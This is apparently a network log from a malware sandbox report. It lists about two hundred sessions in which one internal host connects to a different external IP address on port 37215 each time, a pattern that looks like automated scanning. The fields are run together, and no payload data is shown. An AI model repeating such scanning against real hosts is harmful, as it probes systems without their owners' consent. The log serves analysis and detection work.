                                                  5735192.168.2.133416641.167.119.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5736192.168.2.1332898190.38.124.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5737192.168.2.1347342157.12.104.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5738192.168.2.1349668157.127.78.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5739192.168.2.1345366157.135.148.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5740192.168.2.1353502157.63.228.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5741192.168.2.133588858.232.169.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5742192.168.2.1345126154.115.211.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5743192.168.2.1342834107.97.211.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5744192.168.2.134956641.132.216.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5745192.168.2.136046263.122.0.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5746192.168.2.1345740157.218.203.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5747192.168.2.135323041.137.114.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5748192.168.2.1333650182.87.126.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5749192.168.2.134933067.182.189.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5750192.168.2.1343690197.126.32.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5751192.168.2.1353728157.59.161.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5752192.168.2.1360374197.213.187.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5753192.168.2.134969041.166.107.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5754192.168.2.1353344197.235.113.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5755192.168.2.134407041.23.184.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5756192.168.2.135326295.186.100.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5757192.168.2.1354092157.70.31.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5758192.168.2.1342336197.252.31.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5759192.168.2.135160424.121.15.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5760192.168.2.134278641.125.160.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5761192.168.2.1342700157.98.121.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5762192.168.2.1351368157.157.252.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5763192.168.2.1355476157.32.127.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5764192.168.2.1350176128.43.51.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5765192.168.2.1347416157.67.232.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5766192.168.2.133901041.124.51.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5767192.168.2.1333970157.251.95.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5768192.168.2.1351426157.72.25.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5769192.168.2.1342566157.142.40.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5770192.168.2.1345340197.32.206.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5771192.168.2.1340930197.5.211.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5772192.168.2.133570241.211.238.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5773192.168.2.135829441.125.37.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5774192.168.2.1349686157.191.43.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5775192.168.2.1357620197.101.52.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5776192.168.2.133919241.4.135.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5777192.168.2.1334204197.106.113.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5778192.168.2.1333040211.231.86.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5779192.168.2.1347134197.190.13.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5780192.168.2.133932641.193.229.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5781192.168.2.1351322157.39.77.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5782192.168.2.1354198157.142.132.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5783192.168.2.135040841.26.115.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5784192.168.2.1341876157.100.153.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5785192.168.2.1341502197.255.34.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5786192.168.2.136049046.236.30.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5787192.168.2.1347708197.220.36.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5788192.168.2.1359858157.172.34.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5789192.168.2.1358350157.214.34.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5790192.168.2.1337430155.214.116.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5791192.168.2.1346154157.38.160.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5792192.168.2.1339618157.227.149.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5793192.168.2.135367641.92.6.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5794192.168.2.134977261.79.81.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5795192.168.2.1339254197.109.40.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5796192.168.2.133974041.3.95.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5797192.168.2.1351050211.50.102.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5798192.168.2.1353448157.206.242.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5799192.168.2.135278641.47.202.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5800192.168.2.1347910157.254.208.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5801192.168.2.1342580157.202.164.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5802192.168.2.1356562197.20.96.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5803192.168.2.1353056197.114.194.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5804192.168.2.1345404197.23.247.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5805192.168.2.1350798197.254.137.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5806192.168.2.134067235.32.214.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5807192.168.2.1355110157.30.7.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5808192.168.2.1336150197.188.34.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5809192.168.2.1359718197.135.39.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5810192.168.2.1356822100.166.11.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5811192.168.2.135928841.127.128.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5812192.168.2.1359862157.144.194.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5813192.168.2.1357044157.89.88.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5814192.168.2.1343944157.113.234.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5815192.168.2.1354500197.133.142.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5816192.168.2.1349982157.174.121.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5817192.168.2.133635841.47.53.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5818192.168.2.1334424197.97.202.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5819192.168.2.1333572197.104.218.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5820192.168.2.135966041.100.173.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5821192.168.2.1343180197.176.237.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5822192.168.2.134982685.102.56.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5823192.168.2.133617266.162.189.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5824192.168.2.1343032157.114.129.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5825192.168.2.134232241.94.170.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5826192.168.2.1351212197.94.222.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5827192.168.2.1356778197.6.99.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5828192.168.2.1337272197.85.66.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5829192.168.2.135915241.186.58.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5830192.168.2.1334608137.146.199.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5831192.168.2.1342616114.197.119.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5832192.168.2.135765276.54.98.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5833192.168.2.1339730208.120.30.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5834192.168.2.134159450.243.89.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5835192.168.2.134356441.63.168.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5836192.168.2.135567841.182.119.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5837192.168.2.1342144157.177.150.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5838192.168.2.1357116140.61.16.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5839192.168.2.1348640197.153.7.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5840192.168.2.135437241.176.129.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5841192.168.2.1358512197.17.97.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5842192.168.2.1349072197.253.85.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5843192.168.2.1337242157.119.50.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5844192.168.2.1353954197.70.195.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5845192.168.2.1347656195.171.204.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5846192.168.2.1335046157.90.215.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5847192.168.2.1339654197.127.6.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5848192.168.2.133679441.233.5.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5849192.168.2.1350578157.71.27.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5850192.168.2.1343632197.214.10.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5851192.168.2.135647841.32.108.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5852192.168.2.134598441.251.255.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5853192.168.2.1359192201.68.22.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5854192.168.2.1357744197.77.222.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5855192.168.2.1342572197.239.91.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5856192.168.2.135869041.197.38.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5857192.168.2.134817641.124.132.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5858192.168.2.1354136157.245.199.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5859192.168.2.1353810157.251.7.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5860192.168.2.136097441.149.114.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5861192.168.2.1352214157.221.187.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5862192.168.2.1345232218.138.38.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5863192.168.2.1353592103.138.154.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5864192.168.2.1346058157.158.65.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5865192.168.2.1349760197.231.84.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5866192.168.2.1348734157.185.122.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5867192.168.2.1360026129.222.89.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5868192.168.2.1352942197.12.162.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5869192.168.2.1356492197.179.196.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5870192.168.2.135820441.72.231.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5871192.168.2.1338294197.32.14.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5872192.168.2.134482241.43.224.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5873192.168.2.1343554156.47.61.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5874192.168.2.133450677.68.253.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5875192.168.2.1346088197.5.115.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5876192.168.2.1345612171.178.111.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5877192.168.2.1347086197.154.249.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5878192.168.2.1350830196.186.101.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5879192.168.2.1339948157.68.238.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5880192.168.2.133842688.6.186.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5881192.168.2.1354450197.139.116.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5882192.168.2.1357604157.18.132.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5883192.168.2.1357716157.6.165.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5884192.168.2.1335564157.231.241.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5885192.168.2.1350052180.118.110.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5886192.168.2.133855241.65.105.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5887192.168.2.1333364197.81.89.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5888192.168.2.1355362217.219.182.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5889192.168.2.135225641.7.45.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5890192.168.2.133584445.207.245.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5891192.168.2.135712441.147.14.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5892192.168.2.135890041.54.72.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5893192.168.2.1344396157.98.6.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5894192.168.2.1336928204.157.171.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5895192.168.2.1346080197.113.103.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5896192.168.2.1349608157.205.220.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5897192.168.2.1344086157.99.20.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5898192.168.2.1355706197.100.89.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5899192.168.2.1349284169.143.183.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5900192.168.2.1341436197.88.66.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5901192.168.2.1350826144.36.216.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5902192.168.2.1348952157.219.233.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5903192.168.2.1360090197.225.71.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5904192.168.2.1343332157.78.101.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5905192.168.2.1348218186.18.14.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5906192.168.2.135036888.109.163.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5907192.168.2.1356654197.224.132.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5908192.168.2.133725041.72.203.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5909192.168.2.133911041.158.83.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5910192.168.2.1352372142.184.54.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5911192.168.2.133880041.26.63.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5912192.168.2.1346010206.239.152.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5913192.168.2.1333268157.21.169.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5914192.168.2.1333000197.176.203.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5915192.168.2.1359190157.33.198.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5916192.168.2.1341604174.84.203.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5917192.168.2.1333762157.236.178.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5918192.168.2.135637474.8.155.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5919192.168.2.1347564197.92.200.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5920192.168.2.1342824197.209.6.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5921192.168.2.1333436197.218.48.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5922192.168.2.1340284197.197.72.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5923192.168.2.1340316197.85.9.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5924192.168.2.135301041.33.184.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5925192.168.2.1353102197.21.222.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5926192.168.2.1333552157.229.166.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5927192.168.2.135913641.232.44.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5928192.168.2.1334098157.106.4.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5929192.168.2.1334380197.11.48.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5930192.168.2.134352841.233.203.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5931192.168.2.133376423.98.15.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5932192.168.2.1346422197.137.4.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5933192.168.2.136020241.225.30.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5934192.168.2.1348394174.11.26.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5935192.168.2.1354170157.29.88.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5936192.168.2.1356502199.224.175.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5937192.168.2.1337134193.237.56.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5938192.168.2.1342266157.217.84.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5939192.168.2.1348598197.51.190.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5940192.168.2.1340258197.104.100.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5941192.168.2.1350272197.10.128.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5942192.168.2.1340930197.185.26.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5943192.168.2.1336478157.165.17.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
